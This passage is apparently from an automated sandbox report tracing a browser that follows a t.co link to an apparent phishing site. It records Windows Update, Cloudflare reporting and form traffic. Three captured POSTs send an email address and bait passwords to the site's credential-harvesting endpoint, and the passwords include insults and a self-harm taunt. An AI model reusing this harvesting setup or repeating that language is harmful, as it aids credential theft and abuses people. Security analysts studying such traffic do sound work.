                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.16497334.175.87.197443
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:07:26 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=eA277dL4f+3cxax&MD=RxVDfndl HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                    Host: slscr.update.microsoft.com
                                    2024-11-27 22:07:26 UTC560INHTTP/1.1 200 OK
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Content-Type: application/octet-stream
                                    Expires: -1
                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                    MS-CorrelationId: e365c8ff-f664-4fcd-bd38-7c89db57ec98
                                    MS-RequestId: 598e26f0-34e4-4b9f-955c-97909963f242
                                    MS-CV: zlYlT+uiL0e8HFZd.0
                                    X-Microsoft-SLSClientCache: 1440
                                    Content-Disposition: attachment; filename=environment.cab
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 27 Nov 2024 22:07:25 GMT
                                    Connection: close
                                    Content-Length: 30005
                                    2024-11-27 22:07:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                    2024-11-27 22:07:26 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.164973635.190.80.14437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:07:43 UTC546OUTOPTIONS /report/v4?s=aIqlt4R4EBdH8iEfAqquLuNB4MKYmEYRnTzUMH%2BFJG%2BYkUOIvVmIgYYlQ5IBh0akJ4i3NZdnotWOi5wHqrc9eqvQyT8p0aETh%2F8%2FpXnuVmzk7MvvsFghmzuPqofY0pT%2FZQgy7rak HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://flowerrainoover.com
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:07:43 UTC336INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: OPTIONS, POST
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-length, content-type
                                    date: Wed, 27 Nov 2024 22:07:43 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.164973735.190.80.14437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:07:44 UTC484OUTPOST /report/v4?s=aIqlt4R4EBdH8iEfAqquLuNB4MKYmEYRnTzUMH%2BFJG%2BYkUOIvVmIgYYlQ5IBh0akJ4i3NZdnotWOi5wHqrc9eqvQyT8p0aETh%2F8%2FpXnuVmzk7MvvsFghmzuPqofY0pT%2FZQgy7rak HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 438
                                    Content-Type: application/reports+json
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:07:44 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 36 36 36 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 37 2e 32 35 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 6c 6f 77 65 72 72 61 69 6e 6f 6f 76
                                    Data Ascii: [{"age":56661,"body":{"elapsed_time":3300,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.157.254","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://flowerrainoov
                                    2024-11-27 22:07:45 UTC168INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    date: Wed, 27 Nov 2024 22:07:44 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.1649739172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:07:47 UTC996OUTPOST /.dlk/send.php HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    Content-Length: 64
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Origin: https://flowerrainoover.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
                                    2024-11-27 22:07:47 UTC64OUTData Raw: 65 6d 61 69 6c 3d 69 74 25 34 30 53 54 45 49 4e 42 4f 52 4e 2e 43 4f 4d 26 70 61 73 73 77 6f 72 64 3d 46 55 43 4b 41 50 48 49 43 48 49 4e 47 42 49 54 43 48 26 73 74 61 67 65 3d 6c 6f 67 69 6e
                                    Data Ascii: email=it%40STEINBORN.COM&password=FUCKAPHICHINGBITCH&stage=login
                                    2024-11-27 22:07:48 UTC1086INHTTP/1.1 302 Found
                                    Date: Wed, 27 Nov 2024 22:07:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: POST
                                    Access-Control-Allow-Headers: Content-Type
                                    Location:
                                    X-Server-Powered-By: Engintron
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiCl0pEzjvNppRHBwfVqKmmycE%2B2TzIyCjKR8YWgx9Cxs8zID48bPllNnNLsoZlNIXL4psGz%2FR%2FQsUIEZiQzhVu9Ze1Zp61vhgSmUN3%2BMEPrgaiOyN5YCRKhjhh3vbP%2FZMTeb%2B8i"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956ee36fdcf78d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1454&rtt_var=556&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1682&delivery_rate=1949265&cwnd=32&unsent_bytes=0&cid=cd686d0f3e73afc3&ts=839&x=0"
                                    2024-11-27 22:07:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.1649741172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:08:01 UTC996OUTPOST /.dlk/send.php HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    Content-Length: 56
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Origin: https://flowerrainoover.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
                                    2024-11-27 22:08:01 UTC56OUTData Raw: 65 6d 61 69 6c 3d 69 74 25 34 30 53 54 45 49 4e 42 4f 52 4e 2e 43 4f 4d 26 70 61 73 73 77 6f 72 64 3d 4e 6f 42 61 6c 6c 43 75 6e 74 26 73 74 61 67 65 3d 6c 6f 67 69 6e
                                    Data Ascii: email=it%40STEINBORN.COM&password=NoBallCunt&stage=login
                                    2024-11-27 22:08:01 UTC1085INHTTP/1.1 302 Found
                                    Date: Wed, 27 Nov 2024 22:08:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: POST
                                    Access-Control-Allow-Headers: Content-Type
                                    Location:
                                    X-Server-Powered-By: Engintron
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wyNyFZqArzb%2F8uNXZ%2FCovuJocXXc9jFD9rSF8G5eGSR3v9%2F4ooR3mMm5GPAVex4xpkNZ1Z3%2Fo3eQwlMjigp9ObhF8TQSschQaLjumGICM277lvklX1zhu1lexPTbGqHizZ66z43%2F"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956f385b87c343-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1648&rtt_var=625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1674&delivery_rate=1771844&cwnd=208&unsent_bytes=0&cid=5b2a8354b394bf86&ts=841&x=0"
                                    2024-11-27 22:08:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.1649744172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:08:30 UTC996OUTPOST /.dlk/send.php HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    Content-Length: 67
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Origin: https://flowerrainoover.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
                                    2024-11-27 22:08:30 UTC67OUTData Raw: 65 6d 61 69 6c 3d 69 74 25 34 30 53 54 45 49 4e 42 4f 52 4e 2e 43 4f 4d 26 70 61 73 73 77 6f 72 64 3d 79 6f 75 73 68 6f 75 6c 64 6b 69 6c 6c 79 6f 75 72 73 65 6c 66 26 73 74 61 67 65 3d 6c 6f 67 69 6e
                                    Data Ascii: email=it%40STEINBORN.COM&password=youshouldkillyourself&stage=login
                                    2024-11-27 22:08:31 UTC1081INHTTP/1.1 302 Found
                                    Date: Wed, 27 Nov 2024 22:08:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: POST
                                    Access-Control-Allow-Headers: Content-Type
                                    Location:
                                    X-Server-Powered-By: Engintron
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6gNIi4InHWAPF6B1V1TGBG95var0Y%2Fps0n5qp8wQ%2FAb1O1oVrg4mh6m1NiWZKSzGMug61EyRLIAOH8dzn0Q1OIvHHrqk8O8GSmOB2oDViN3P8xP1yXrbjjYyl8qraMgi%2B6lvJkmt"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956ff0ab664379-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1631&rtt_var=642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1685&delivery_rate=1790312&cwnd=194&unsent_bytes=0&cid=e084927bfa654308&ts=839&x=0"
                                    2024-11-27 22:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Click to jump to process

                                    Click to jump to process

                                    Click to jump to process

                                    Target ID:0
                                    Start time:17:06:33
                                    Start date:27/11/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                    Imagebase:0x7ff7f9810000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:1
                                    Start time:17:06:34
                                    Start date:27/11/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1952,i,12504391894528968252,14865817341340154054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Imagebase:0x7ff7f9810000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:2
                                    Start time:17:06:35
                                    Start date:27/11/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.co/nq9BYOxCg9"
                                    Imagebase:0x7ff7f9810000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    No disassembly